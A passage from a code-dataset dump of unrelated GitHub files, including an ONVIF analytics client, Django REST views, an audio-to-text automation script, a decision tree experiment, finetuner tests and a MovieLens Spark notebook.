RuleOptions - optional, unbounded; [ConfigOptions]\n A device shall provide respective ConfigOptions.\n RuleType for each RuleOption if the request does not specify RuleType. 
\n The response Options shall not contain any AnalyticsModule attribute.\n \"\"\"\n rule_options = {}\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetRuleOptions information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n if rule_type != None: \n rule_options = ws_client_analytics.GetRuleOptions(ConfigurationToken = configuration_token,RuleType = rule_type)\n else: \n rule_options = ws_client_analytics.GetRuleOptions(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetRuleOptions unsuccess.. -> {emsg}\")\n else: logger.info(f\"GetRuleOptions complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return rule_options\n # RuleEngineBinding\n def GetRules(self,configuration_token : str) -> list:\n \"\"\"\n List the currently assigned set of rules of a VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n Reference to an existing VideoAnalyticsConfiguration.\n - return [list];\n - Rule - optional, unbounded; [Config]\n List of Rules \n \"\"\"\n rules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetRules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n rules = ws_client_analytics.GetRules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetRules unsuccess.. -> {emsg}\")\n else:\n logger.info(f\"GetRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return rules\n # RuleEngineBinding\n def GetSupportedRules(self,configuration_token : str) -> list:\n \"\"\"\n List all rules that are supported by the given VideoAnalyticsConfiguration.\n - requirements : \n - configuration_token : [str] \n References an existing Video Analytics configuration. \n The list of available tokens can be obtained via the Media service GetVideoAnalyticsConfigurations method.\n - return [list];\n - SupportedRules [SupportedRules]\n \"\"\"\n supported_rules = []\n if self.onvif_service.get_con_status():\n if self.is_analytics_service_supported:\n logger.info(f\"Try to GetSupportedRules information..\")\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n supported_rules = ws_client_analytics.GetSupportedRules(ConfigurationToken = configuration_token)\n except Exception as emsg:\n logger.error(f\"GetSupportedRules unsuccess.. 
-> {emsg}\")\n else:\n logger.info(f\"GetSupportedRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return supported_rules\n # RuleEngineBinding\n def ModifyRules(self,request_message : AnalyticsRequestMessages.ModifyRulesMessage) -> bool:\n \"\"\"\n Modify one or more rules of a VideoAnalyticsConfiguration. The rules are referenced by their names.\n - requirements;\n - request_message : [ModifyRulesMessage]\n An Object for ModifyRules request message \n - return [boolean];\n - status : True means OK else False \n \"\"\"\n status = False\n if self.onvif_service.get_con_status():\n logger.info(f\"Try to ModifyRules request..\")\n if self.is_analytics_service_supported:\n try:\n zeepAnalyticsClient = get_caching_client(isAuth=True,wsdl_URL=self.wsdlUrl,username_token=self.onvif_service.get_username_token())\n ws_client_analytics = zeepAnalyticsClient.create_service(\"{\" + self.analytics_name_space + \"}RuleEngineBinding\", self.xAddr)\n ws_client_analytics.ModifyRules(**request_message.to_dict())\n except Exception as emsg:\n logger.error(f\"ModifyRules unsuccess.. -> {emsg}\")\n else:\n status = True\n logger.info(f\"ModifyRules complete with success..\")\n else: logger.error(f\"Analytics Service not supported..\")\n else: logger.warning(f\"No Onvif Connection!\")\n return status","repo_name":"enstns/onvif-python","sub_path":"lib/services/analytics_service.py","file_name":"analytics_service.py","file_ext":"py","file_size_in_byte":25277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23457095216","text":"from rest_framework import status\nfrom django.db.models import Q\nfrom rest_framework.permissions import IsAuthenticated\nfrom .serializer import ThunesUserAccountSerializer, ThunesUserTransactionSerializer, ThunesUserAccountTopupSerializer\nfrom rest_framework.generics import CreateAPIView, ListCreateAPIView, ListAPIView\nfrom .models import UserAccount, Transaction\nfrom rest_framework.response import Response\nfrom apps.accounts.utils.pagination import PaginationWithDefaults\n# Create your views here.\n\n\nclass ThunesUserAccountAPI(CreateAPIView):\n permission_required = (IsAuthenticated,)\n serializer_class = ThunesUserAccountSerializer\n\n def get(self, request):\n user_id = request.user.id\n user_account = UserAccount.objects.filter(user_id=user_id).first()\n serializer = ThunesUserAccountSerializer(user_account)\n return Response(serializer.data)\n\n\nclass ThunesUserAccountTopupAPI(CreateAPIView):\n permission_required = (IsAuthenticated,)\n serializer_class = ThunesUserAccountTopupSerializer\n\n\n\nclass ThunesTransactionAPI(ListCreateAPIView):\n permission_required = [IsAuthenticated]\n serializer_class = ThunesUserTransactionSerializer\n pagination_class = PaginationWithDefaults\n\n def get_queryset(self):\n # get all transaction\n transactions = Transaction.objects.filter(Q(sender_id=self.request.user.id) | Q(\n receiver_id=self.request.user.id))\n return transactions","repo_name":"AzizieAbuduaini/bank-account-api","sub_path":"apps/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29376655417","text":"import os\nimport shutil\nfrom pydub import AudioSegment\nfrom pydub.utils import make_chunks\nfrom selenium import webdriver\nimport time\nimport re\n\ndir_parent = 
'D:\\\\测试音频'\t\t#音频存放位置\ndir_letter = dir_parent + '\\\\合并后的音频'\t#合并后的音频存放的位置\ndir_letter_letter = dir_parent + '\\\\切割后的音频'\t#切割后的音频存放的位置\ndir_letter_txt = dir_parent + '\\\\转换后的txt文件'\t#下载转换后的txt文件存放的位置\nadd_sound = AudioSegment.from_wav('sample.wav')\t\t#sample.wav是间隔音频,和脚本放在同一目录\nsum_sound = add_sound\n\n# 分别和并同一文件夹下的所有音频\nfor path,dir_list,file_list in os.walk(dir_parent):\n for dir_name in dir_list:\n dir_child = dir_parent + '\\\\' + dir_name\n for path,dir_list,file_list in os.walk(dir_child):\n for file_name in file_list:\n #print(file_name)\n front_path = os.path.join(path, file_name)\n #print(front_path)\n front_sound = AudioSegment.from_wav(front_path)\n sum_sound = sum_sound + front_sound + add_sound\n sum_sound.export(dir_child+'已合并.wav',format=\"wav\")\n sum_sound = add_sound\n print(dir_child+'文件下的音频合并完成')\n \n# 将处理过的音频放入同一文件夹内\nos.makedirs(dir_letter)\nfor file in os.listdir(dir_parent):\n if os.path.isfile(dir_parent + '\\\\' + file):\n if '已合并' in file:\n shutil.move(dir_parent + '\\\\' + file,dir_letter) \nprint(\"所有音频合并完成\")\n\n\n# 切割合并后的音频\nchunk_length_ms = 325000 # 分块的毫秒数(测试wav文件每个音频如果在325s内刚好不多于20M,当然也可以改成300s)\nos.makedirs(dir_letter_letter) # 创建切割音频的文件夹\nfor path,dir_list,file_list in os.walk(dir_letter):\n for file_name in file_list:\n audio = AudioSegment.from_file(dir_letter+'\\\\'+file_name , \"wav\") \n chunks = make_chunks(audio, chunk_length_ms) #将音频切割\n #保存切割的音频到文件\n # 下面两行目的是对文件名进行简单处理,保证文件名都是数字,排序时方便整理,这个因文件名而异\n file_name_change1 = file_name.strip('已合并.wav')\n file_name_change2 = file_name_change1.strip('AAAAA')\t#AAAAA是file_name的前缀\n for i, chunk in enumerate(chunks):\n chunk_name = dir_letter_letter+\"\\\\\"+file_name_change2+\"{0}.wav\".format(i)\n chunk.export(chunk_name, format=\"wav\")\n print (\"音频\"+file_name_change2+\"切割完成\")\nprint(\"所有音频切割完成\")\n\n# 转换音频文件\n# 更改firefox默认下载设置,不懂可自行Google\nprofile = webdriver.FirefoxProfile()\nprofile.set_preference('browser.download.dir',dir_letter_letter)\nprofile.set_preference('browser.download.folderList',2)\nprofile.set_preference('browser.download.manager.showWhenStarting',False)\nprofile.set_preference('browser.helperApps.neverAsk.saveToDisk','text/plain')\n\n# 历遍文件夹内的文件并返回一个列表\npath_list = os.listdir(dir_letter_letter)\n# 利用循环历遍path_list列表\nfor file_name in path_list:\n #print(filename)\n #启动浏览器\n driver1 = webdriver.Firefox(firefox_profile=profile)\n driver1.get(\"https://app.xunjiepdf.com/voice2text/\")\t#打开迅捷转换网页\n print('开始上传'+file_name+'音频文件')\n upload = driver1.find_element_by_name('file')\t#寻找上传按钮\n upload.send_keys(dir_letter_letter+'\\\\'+file_name) #上传文件\n print('音频文件'+file_name+'上传成功')\n time.sleep(5)\n driver1.execute_script(\"arguments[0].click();\", driver1.find_element_by_xpath(\"//span[contains(text(),'开始转换')]\"))\n time.sleep(35)\n print('开始下载文件')\n driver1.execute_script(\"arguments[0].click();\", driver1.find_element_by_xpath(\"//a[contains(text(),'立即下载')]\"))#定位txt下载按钮并下载\n print('文件下载成功')\nprint('所有文件下载完成')\n","repo_name":"Leeyuxun/Audio-to-Text","sub_path":"脚本1.py","file_name":"脚本1.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"35515474674","text":"class Node:\n def __init__(self, v):\n self.val = v\n self.next = None\n\ndef reverse(head: Node) -> Node:\n if head.next == None:\n return head\n next = head.next\n newHead = reverse(next)\n next.next = head\n head.next = None\n return newHead\n\nnode = Node(1)\nnode.next = Node(2)\nnode.next.next = Node(3)\nnode.next.next.next 
= Node(4)\n\nnode = reverse(node)\ndef output(node):\n while node != None:\n print(node.val)\n node = node.next\noutput(node)","repo_name":"zhuzhu18/leetcode","sub_path":"206反转链表.py","file_name":"206反转链表.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"8671894808","text":"from openerp.osv import osv, fields\n\n\nclass PurchaseRequisition(osv.Model):\n\n _inherit = 'purchase.requisition'\n _columns = {\n 'purchaser_id': fields.many2one(\n 'res.users',\n 'P&C Analyst',\n domain=[('is_purchaser', '=', True)],\n help=('Contract Analyst responsible to evaluate the current'\n ' purchase requisition.')),\n }\n\n def copy(self, cr, uid, id, default=None, context=None):\n default = default or {}\n default.update({'purchaser_id': False})\n return super(PurchaseRequisition, self).copy(cr, uid, id, default,\n context=context)\n\n\nclass ResPartner(osv.Model):\n\n _inherit = 'res.partner'\n _columns = {\n 'is_purchaser': fields.boolean(\n 'P&C Analyst',\n help='Is this a Purchaser?'),\n }\n\n def copy(self, cr, uid, id, default=None, context=None):\n default = default or {}\n default.update({'is_purchaser': False})\n return super(ResPartner, self).copy(cr, uid, id, default,\n context=context)\n","repo_name":"OpenBusinessSolutions/odoo-karina","sub_path":"addons-vauxoo/purchase_requisition_contract_analyst/model/purchase_requisition.py","file_name":"purchase_requisition.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"14353182805","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tree.base import DecisionTree\nfrom metrics import *\n\nnp.random.seed(42)\n\nfrom sklearn.datasets import make_classification\nX, y = make_classification(\nn_features=2, n_redundant=0, n_informative=2, random_state=1, n_clusters_per_class=2, class_sep=0.5)\n\n# For plotting\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.show()\n# print(X)\nX=pd.DataFrame(X)\n#print(X.head())\ny=pd.Series(y)\nfor criteria in ['information_gain', 'gini_index']:\n tree = DecisionTree(criterion=criteria) #Split based on Inf. 
Gain\n tree.fit(X.iloc[:70,:], y.iloc[:70:])\n y_hat = tree.predict(X.iloc[71:,:])\n print(\"accuracy: \",accuracy(y_hat,y.iloc[71::]))\n print('Criteria :', criteria)\n for i in y.unique(): # gives per class precision and recall\n print(\"precision: \",precision(y_hat,y.iloc[71::],i))\n print(\"recall: \",recall(y_hat,y.iloc[71::],i))\n\nX['y']=y\n# 5-fold crossvalidation for the generated data\ndef fivefoldcv(X):\n l=X.shape[0]\n fold_acc=[]\n depths=[]\n #outer loop to divide test and train\n for i in range(5):\n fold_train=X.iloc[:round(l*(0.8)),:]\n fold_test=X.iloc[round(l*(0.8)):,:]\n ar=np.array_split(fold_train,5)\n acc_arr=[]\n #train and validation split\n for j in range(5):\n val_data=ar[0]\n val_y=val_data['y']\n val_X=val_data.drop(['y'],axis=1)\n frames=[]\n for k in range(j):\n if k!=j:\n frames.append(ar[k])\n train_data=pd.concat(ar)\n train_y = train_data['y']\n train_X = train_data.drop(['y'], axis=1)\n # print(train_X)\n # print(train_y)\n # train the model with different depths and test it on the validation set\n depth_acc = [0]\t\t\n for m in range(1, 11):\n tree = DecisionTree('inforamation_gain', m)\n tree.fit(train_X, train_y)\n y_hat = tree.predict(val_X)\n acc = accuracy(y_hat, val_y)\n depth_acc.append(acc)\n acc_arr.append(depth_acc)\n # calulate average accuracy for each depth\n l = len(acc_arr)\n avg_accs = [0]\n for t in range(1,11):\n temp = []\n for j in range(5):\n temp.append(acc_arr[j][t])\n avg = np.mean(temp)\n avg_accs.append(avg)\n for k in range(1,11):\n if(avg_accs[k]>avg_accs[k-1]):\n print(\"depth: \", k, ' --> accuracy: ', avg_accs[k])\n \n # take the best depth from validation\n best_depth = 10\n max_acc = 0\n for k in range(1,11):\n if(avg_accs[k]>max_acc):\n max_acc = avg_accs[k]\n best_depth = k\n \n #finding the fold accuracy\n testing_y=fold_train['y']\n testing_X=fold_train.drop(['y'],axis=1)\n final_y=fold_test['y']\n final_x=fold_test.drop(['y'],axis=1)\n tree = DecisionTree('inforamation_gain', best_depth)\n tree.fit(testing_X, testing_y)\n y_final = tree.predict(final_x)\n ac = accuracy(y_final, final_y)\n fold_acc.append(ac)\n depths.append(best_depth)\n\t\n # print(fold_accuracies)\n return fold_acc, depths\nprint(fivefoldcv(X))\n","repo_name":"KeyurIITGN/Decision-Trees-From-Scratch","sub_path":"assignment-1/classification-exp.py","file_name":"classification-exp.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33970231224","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom reporting.models import ProductStock, SaleHistory\nfrom internal.serializers import StockSerializer, SaleHistorySerializer, OrderSerializer\nfrom internal.models import Order\n\n@api_view(['GET'])\ndef get_all (request):\n stock = ProductStock.objects.all()\n serializer = StockSerializer(stock, many = True)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef get_stock_name (request, pk):\n try:\n stock = ProductStock.objects.filter(name =pk)\n serializer = StockSerializer(stock, many = False)\n return Response({'message':'Stock for the asked product'}, status=status.HTTP_200_OK)\n \n except Exception as e:\n return Response({\"error\":str(e)},status=status.HTTP_204_NO_CONTENT)\n\n\n@api_view(['GET'])\ndef get_order(request):\n order = order.objects.all()\n serializer = OrderSerializer(order, many= True)\n return Response(serializer.data)\n\n 
","repo_name":"tanmaya-arora/RWA_Management","sub_path":"reporting/views/stock_views.py","file_name":"stock_views.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37590511159","text":"from modis_data_download import countries, getmodis3\nfrom modis_data_prep import process_date\nfrom modis_concatenate import combine_csv\n\n\n'''Check if directory exists, if not, create it'''\nimport os\n\nfor country in countries:\n\n # You should check in your preferred folder.\n MYDIR = ('D:/Mitch/Repos/Streamlit/measuring_carbon/test/Modis_Fires/modis_firms' + country)\n CHECK_FOLDER = os.path.isdir(MYDIR)\n\n # If folder doesn't exist, then create it.\n if not CHECK_FOLDER:\n os.makedirs(MYDIR)\n # print(\"created folder : \", MYDIR)\n # change working directory to folder\n os.chdir(MYDIR) \n # scrape & download the files\n getmodis3(country,range(2015,2022))\n # preprocess country files\n modis_2015 = process_date(r'modis_2015_'+ country +'.csv')\n modis_2016 = process_date(r'modis_2016_'+ country +'.csv')\n modis_2017 = process_date(r'modis_2017_'+ country +'.csv')\n modis_2018 = process_date(r'modis_2018_'+ country +'.csv')\n modis_2019 = process_date(r'modis_2019_'+ country +'.csv')\n modis_2020 = process_date(r'modis_2020_'+ country +'.csv')\n modis_2021 = process_date(r'modis_2021_'+ country +'.csv')\n\n modis_2015.to_csv('modis_2015_' + country + '.csv', index = False)\n modis_2016.to_csv('modis_2016_' + country + '.csv', index = False)\n modis_2017.to_csv('modis_2017_' + country + '.csv', index = False)\n modis_2018.to_csv('modis_2018_' + country + '.csv', index = False)\n modis_2019.to_csv('modis_2019_' + country + '.csv', index = False)\n modis_2020.to_csv('modis_2020_' + country + '.csv', index = False)\n modis_2021.to_csv('modis_2021_' + country + '.csv', index = False)\n print(f\"{country} preprocessing done \")\n # concatenate\n #export to csv\n combined_csv = combine_csv()\n combined_csv.to_csv(country + \".csv\", index=False, encoding='utf-8-sig')\n print(f\"{country} concatenated\")\n\n \n# else:\n # print(MYDIR, \"folder already exists.\")\n","repo_name":"Mitchell-Odili/Modis_Fires","sub_path":"code/modis_multiple_files_preparation.py","file_name":"modis_multiple_files_preparation.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"181539350","text":"\nclass ViewRequiredException(Exception):\n \"\"\"\n Raised when a frame is required but not found.\n \"\"\"\n def __init__(self, message=None):\n if not message:\n message = \"No frames have been registered.\"\n super().__init__(message)\n\n\nclass UnfiApiClientNotSetException(Exception):\n \"\"\"\n Raised when a client is required but not found.\n \"\"\"\n def __init__(self, message=None):\n if not message:\n message = \"UnfiApiClient is required but not found.\"\n \n super().__init__(message)","repo_name":"sonicdm/myunfi_api","sub_path":"UNFI File Search/unfi_gui/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"16585646158","text":"import os\n\nimport numpy as np\nimport pytest\nfrom docarray import DocumentArray\nfrom tests.helper import create_random_name\n\nimport finetuner\nfrom finetuner.constants import FAILED, FINISHED, STATUS\nfrom finetuner.model import 
synthesis_model_en\n\n\ndef test_runs(finetuner_mocker, get_feature_data):\n experiment_name = create_random_name()\n\n # get preprocessed data\n train_data, eval_data = get_feature_data\n\n # create an experiment and retrieve it\n finetuner_mocker.create_experiment(experiment_name)\n experiment = finetuner_mocker.get_experiment(name=experiment_name)\n assert experiment.name == experiment_name\n assert experiment.status == 'ACTIVE'\n\n # Create Runs\n first_run, second_run = [create_random_name(prefix='run') for _ in range(2)]\n\n # create a first run\n finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_data,\n eval_data=eval_data,\n experiment_name=experiment_name,\n run_name=first_run,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=1e-3,\n batch_size=12,\n epochs=2,\n device='cpu',\n )\n\n # get the first run\n run = finetuner_mocker.get_run(experiment_name=experiment_name, run_name=first_run)\n assert run.name == first_run\n\n # create another run\n finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_data,\n eval_data=eval_data,\n experiment_name=experiment_name,\n run_name=second_run,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=1e-3,\n batch_size=12,\n epochs=1,\n device='cpu',\n )\n\n # list all runs\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert len(runs) == 2\n run_names = [run.name for run in runs]\n assert first_run in run_names and second_run in run_names\n\n # delete the first run\n finetuner_mocker.delete_run(experiment_name=experiment_name, run_name=first_run)\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert len(runs) == 1\n\n # delete all existing runs\n finetuner_mocker.delete_runs(experiment_name=experiment_name)\n runs = finetuner_mocker.list_runs(experiment_name=experiment_name)\n assert not runs\n\n # delete experiment\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n\n\n@pytest.mark.parametrize('use_onnx', [True, False])\ndef test_create_training_run_and_save_model(\n finetuner_mocker, get_feature_data, tmp_path, use_onnx\n):\n import time\n\n train_da, test_da = get_feature_data\n experiment_name = create_random_name()\n finetuner_mocker.create_experiment(name=experiment_name)\n run = finetuner_mocker.create_training_run(\n model='mlp',\n model_options={'input_size': 128, 'hidden_sizes': [32]},\n train_data=train_da,\n loss='TripletMarginLoss',\n optimizer='Adam',\n learning_rate=0.001,\n batch_size=12,\n epochs=2,\n experiment_name=experiment_name,\n to_onnx=use_onnx,\n device='cpu',\n )\n status = run.status()[STATUS]\n\n # wait for up to 20 minutes for the run to finish\n for _ in range(6 * 20):\n if status in [FAILED, FINISHED]:\n break\n time.sleep(10)\n status = run.status()[STATUS]\n\n assert status == FINISHED\n\n artifact_id = run.artifact_id\n assert isinstance(artifact_id, str)\n # the artifact id is a 24 character hex string defined in mongo db.\n assert len(artifact_id) == 24\n\n artifact = run.save_artifact(directory=tmp_path / 'finetuned_model')\n assert os.path.exists(tmp_path / 'finetuned_model')\n\n # encode and check the embeddings\n model = finetuner.get_model(artifact=artifact, is_onnx=use_onnx)\n finetuner.encode(model=model, data=test_da)\n assert 
test_da.embeddings is not None\n assert isinstance(test_da.embeddings, np.ndarray)\n\n # delete created experiments (and runs)\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n\n\ndef test_create_synthesis_run_and_save_data(\n finetuner_mocker, synthesis_query_data, synthesis_corpus_data\n):\n import time\n\n experiment_name = create_random_name()\n finetuner_mocker.create_experiment(name=experiment_name)\n run = finetuner_mocker.create_synthesis_run(\n query_data=synthesis_query_data,\n corpus_data=synthesis_corpus_data,\n models=synthesis_model_en,\n num_relations=3,\n experiment_name=experiment_name,\n )\n status = run.status()[STATUS]\n\n # wait for up to 20 minutes for the run to finish\n for _ in range(6 * 20):\n if status in [FAILED, FINISHED]:\n break\n time.sleep(10)\n status = run.status()[STATUS]\n\n assert status == FINISHED\n\n train_data = run.train_data\n assert isinstance(train_data, str)\n train_data = DocumentArray.pull(train_data)\n\n for doc in train_data['@c']:\n assert doc.content is not None\n\n # delete created experiments (and runs)\n finetuner_mocker.delete_experiment(experiment_name)\n experiments = finetuner_mocker.list_experiments()\n assert experiment_name not in [experiment.name for experiment in experiments]\n","repo_name":"jina-ai/finetuner","sub_path":"tests/integration/test_runs.py","file_name":"test_runs.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":1320,"dataset":"github-code","pt":"73"} +{"seq_id":"30398145180","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# %load data.py\nfrom __future__ import print_function, division\n\nimport csv\nimport functools\nimport json\nimport os\nimport random\nimport warnings\n\nimport numpy as np\nimport torch\n#from pymatgen.core.structure import Structure\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.dataloader import default_collate\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.autograd import Variable\n\n\ndef CGCNNdata(Dataset, normalizer, model): \n #atom_tablenum=[]\n #pre_out=[]\n #cif_ids=[]\n #atom_bond=[]\n #atom_num=[]\n #target_vol=[]\n cgcnn_dataset=[]\n for i, (input, target, batch_cif_ids, atom_table_num) in enumerate(Dataset):\n vol_out=[]\n with torch.no_grad():\n input_var = (Variable(input[0]),\n Variable(input[1]),\n input[2],\n input[3])\n #atom_bond.append(input[2])\n #atom_num.append(input[3])\n target_normed = normalizer.norm(target)\n with torch.no_grad():\n target_var = Variable(target_normed)\n\n output=model(*input_var)\n\n #local_voltage=LocalEnergy(output[1][1])\n\n vol_out.append(output)\n vol_out.append(input[2])\n vol_out.append(input[3])\n vol_out.append(torch.reshape(atom_table_num, [-1]))\n vol_out.append(batch_cif_ids)\n vol_out.append(target[0])\n cgcnn_dataset.append(vol_out)\n #atom_tablenum.append(torch.reshape(atom_table_num, [-1]))\n #cif_ids.append(batch_cif_ids)\n #target_vol.append(target)\n\n '''\n pre_out[0] the predicted voltage values.\n pre_out[1] the output of every layer\n pre_out[1][0] embedding\n pre_out[1][1] conv\n pre_out[1][2] pooling\n pre_out[1][3] hidden layer\n '''\n return cgcnn_dataset #pre_out, atom_tablenum, cif_ids, atom_bond, atom_num, target_vol\n\ndef collate_pool_local(dataset_list):\n \"\"\"\n Collate a list of data and return a batch for predicting crystal\n properties.\n pre_out, 
atom_tablenum, cif_ids, atom_bond, atom_num, target_vol\n \"\"\"\n batch_nbr_fea= []\n \n bond_atom_incrystal, batch_atom_table_num =[], []\n batch_nbr_fea_idx, crystal_atom_idx=[], []\n batch_cif_ids=[]\n batch_target=[] \n\n base_idx = 0\n\n for i, data_sample in enumerate(dataset_list):\n \n pre_out=data_sample[0]\n nbr_fea=pre_out[1][1]\n batch_nbr_fea.append(nbr_fea)\n \n n_i = nbr_fea.shape[0]\n batch_nbr_fea_idx.append(data_sample[1]+base_idx)\n #crystal_atom_idx.append(data_sample[2]+base_idx)\n new_idx = torch.LongTensor(np.arange(n_i)+base_idx)\n crystal_atom_idx.append(new_idx)\n base_idx += n_i\n \n batch_atom_table_num.append(data_sample[3])\n batch_cif_ids.append(data_sample[4])\n batch_target.append(data_sample[5])\n \n \n \n return (torch.cat(batch_nbr_fea, dim=0),\n torch.cat(batch_nbr_fea_idx, dim=0),\n crystal_atom_idx),\\\n torch.stack(batch_target, dim=0),\\\n batch_cif_ids,\\\n torch.cat(batch_atom_table_num, dim=0)","repo_name":"mpeshel/Interpretable_AI_for_battery","sub_path":"CGCNN_visulization/data_local_vol.py","file_name":"data_local_vol.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"21802433097","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ## MovieLens Data analysis \n# MAGIC \n# MAGIC For this notebook, we will be using a MovieLens sample dataset. The data includes 100,000 ratings and 3,600 tag applications applied to 9,000 movies by 600 users and can be found in https://grouplens.org/datasets/movielens/latest/\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC First, we import the libraries that we are going to use for the data visualization. Then we load the data we just downloades from the MovieLens website. The files were uploaded to an S3 bucket and loaded from there. \n\n# COMMAND ----------\n\nlinks = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/links.csv\")\nmovies = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/movies.csv\")\nratings = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/ratings.csv\")\ntags = spark.read.format(\"csv\").option(\"inferSchema\", \"true\").option(\"header\",\"true\").load(\"s3a://filestoragedatabricks/MovieLensData/tags.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Once the data is loaded, we take a look at them by using the show action is spark. \n\n# COMMAND ----------\n\nlinks.show()\n\n# COMMAND ----------\n\nmovies.show()\n\n# COMMAND ----------\n\nratings.show()\n\n# COMMAND ----------\n\ntags.show()\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC As we cans ee in the table previews, the year of the movie is embeded in the movie title. In order to extract this information, I created a User Defined Function(UDF) that takes the year when available, otherwise it returns null. 
\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import udf\nimport pyspark.sql.functions as F\n\ndef get_year(title):\n try:\n return(int(title[-5:-1]))\n except:\n return(None)\n\n\nget_year_udf = udf(get_year)\n\n# COMMAND ----------\n\nmovies = movies.withColumn(\"year\", get_year_udf(movies.title))\nmovies.show()\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC As part of the analysis of this dataset, it would be useful to have the average rating for each movie. In the following cell of code, I aggregate over the ratings table to get the average rating for each movie ID. \n\n# COMMAND ----------\n\nfrom pyspark.sql.types import FloatType\nfrom pyspark.sql.functions import bround\nfrom pyspark.sql.functions import mean\n\nratings_agg = ratings.groupBy(\"movieId\").agg(mean(\"rating\").alias(\"avg_rating\"))\nratings_agg = ratings_agg.withColumn(\"average_rating\", ratings_agg.avg_rating.cast(FloatType())).drop(\"avg_rating\").withColumnRenamed(\"average_rating\", \"avg_rating\")\nratings_agg = ratings_agg.select(\"movieId\",bround(\"avg_rating\",2).alias(\"avg_rating\"))\nratings_agg.show()\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC Here we evaluate the average rating by year to identify if there is a trend in the ratings either to decrease or increase over the years. Visually, it is not possible to appreaciate such trend, but it was possible to identify some outlayer values in the year column. \n# MAGIC \n# MAGIC To achieve this, it was necessary to join the aggregated ratings table with movies table that includes the year as a column. \n\n# COMMAND ----------\n\njoined_movies = movies.join(ratings_agg,\"movieId\")\njoined_movies.select(\"year\",'avg_rating').groupBy(\"year\").mean().orderBy(\"year\").display()\n\n# COMMAND 